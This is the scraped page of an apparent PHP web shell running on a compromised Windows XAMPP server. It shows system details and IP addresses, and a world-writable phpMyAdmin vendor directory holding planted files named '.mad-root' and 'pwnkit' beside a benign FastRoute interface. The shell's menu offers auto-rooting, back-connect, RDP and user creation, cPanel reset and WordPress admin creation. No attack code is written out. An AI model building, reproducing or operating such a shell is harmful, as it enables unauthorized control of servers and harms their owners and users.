Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.139
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
vendor /
nikic /
fast-route /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
DataGenerator
[ DIR ]
drwxrwxrwx
Dispatcher
[ DIR ]
drwxrwxrwx
RouteParser
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
BadRouteException.php
81
B
-rw-rw-rw-
DataGenerator.php
682
B
-rw-rw-rw-
Dispatcher.php
594
B
-rw-rw-rw-
Route.php
921
B
-rw-rw-rw-
RouteCollector.php
3.77
KB
-rw-rw-rw-
RouteParser.php
1.01
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
bootstrap.php
294
B
-rw-rw-rw-
functions.php
2.49
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RouteParser.php
<?php namespace FastRoute; interface RouteParser { /** * Parses a route string into multiple route data arrays. * * The expected output is defined using an example: * * For the route string "/fixedRoutePart/{varName}[/moreFixed/{varName2:\d+}]", if {varName} is interpreted as * a placeholder and [...] is interpreted as an optional route part, the expected result is: * * [ * // first route: without optional part * [ * "/fixedRoutePart/", * ["varName", "[^/]+"], * ], * // second route: with optional part * [ * "/fixedRoutePart/", * ["varName", "[^/]+"], * "/moreFixed/", * ["varName2", [0-9]+"], * ], * ] * * Here one route string was converted into two route data arrays. * * @param string $route Route string to parse * * @return mixed[][] Array of route data arrays */ public function parse($route); }
Close